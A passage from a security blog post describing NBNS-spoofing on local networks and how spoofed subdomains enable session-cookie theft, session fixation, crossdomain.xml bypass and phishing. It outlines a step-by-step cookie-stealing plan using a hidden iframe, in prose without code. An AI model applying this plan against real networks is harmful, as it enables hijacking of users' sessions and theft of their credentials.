way, NBNS-spoofing attack can be very useful in some situations. The
main plus of this attack is that it doesn’t send any illegal traffic.
DNS-spoofing or arp-poisoning are “aggressive” attacks and perform much
“bad” traffic. So, it’s harder to detect NBNS-spoofing attack by IPS/IDS
systems. In addition, it can be useful when DNSSEC is used in a
network.</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: white;">Ok, but what can we gain with NBNS-spoofing’s limitations?<br />Yes,
we can spoof only hostname which it can’t find via DNS (without DoS of
DNS server), but we can spoof subdomains! And it is enough for us.<br />There is a list, what we can do, if we can spoof subdomain of attacking domain and “redirect” user to our web-server.<br /><br /><b>1) Stole session cookie</b><br />Cookies
can be set to all subdomains of a domain (domain=.foo.com;). So if we
spoof a subdomain of a domain, browser sends us a victim’s session
cookies.<br />Therefore, if a cookie is set without a domain-field (such
situation is very often), Internet Explorer sets them to a domain and
all its subdomains. But, by RFC, IE should set it only to current
domain. (Researched by <a href="https://twitter.com/d0znpp">d0znpp</a>)<br />As we can see, we can steal cookies very often. </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: white;"><b>2) Session Fixation</b><span style="background-color: white;"><br />Same
Origin Policies set an interesting exception to cross domain
interaction rules. Subdomain can set (and rewrite) a cookie of domain.
For example, aaa.google.com can set cookie to google.com, but couldn’t
set to bbb.google.com or zzz.aaa.google.com.<br />We can use it.<br />If a web-application of a server has session fixation vulnerability, we can spoof subdomain of this server and set cookie to it.</span>*A strange moment. During test I was trying to set cookie to “localhost” from subdomain of localhost, but I couldn’t do it. </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b><span style="background-color: white;">3)</span></b><span style="background-color: white;"><b> Cross domain policies bypass.</b><br />It is a frequent situation, when * is used for domain in crossdomain.xml.<br />For example, adobe.com:<br /><allow-access-from domain="*.adobe.com"><br />We can spoof subdomain (aaa.adobe.com) and get full session riding via Flash.<br /><br /><b>4) Phishing</b><br />Classic phishing attacks…</span></div>
<div style="text-align: left;">
<span style="background-color: white;"><br /></span></div>
<div style="text-align: left;">
<span style="background-color: white;"><br /></span></div>
<h3 style="text-align: left;">
<span style="background-color: white;"><span style="font-weight: bold;">Catch a user</span></span></h3>
<h2>
<span style="background-color: white;"></span></h2>
<div style="text-align: left;">
<span style="background-color: white;">In
all these attack vectors, we have a little problem. How to enforce user
to come to our (fake) subdomain? For resolving the problem, we can use a
NBNS-spoofing attack :)<br />Example of cookie stealing for example.com:<br />1) Run NBNS-spoofing against all domains<br />2) Run our web-server with a little script, which should:<br />- Collect incoming cookies (sorted by Host http-request field)<br />- Reply a simple html page with hidden iframe with “src=aaa.example.com”<br />3)
When user inserts into browser any inexistent domain name, our
NBNS-spoofing attack will work and his browser will come to our
web-server. Then the browser will try to open aaa.example.com,
NBNS-spoofing attack will work again and we’ll get cookies from
example.com.</span></div>
<div style="text-align: left;">
<span style="background-color: white;"><br /></span></div>
<div style="text-align: left;">
<span style="background-color: white;"><br /></span></div>
<h3 style="text-align: left;">
<span style="background-color: white;"><span style="font-weight: bold;">Outro</span></span></h3>
<h2>
<span style="background-color: white;"></span></h2>
<div style="text-align: left;">
<span style="background-color: white;">NBNS-spoofing attack is an interesting stuff and it’s not looking too hard to realize such attacks in real life. </span> </div>
</div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0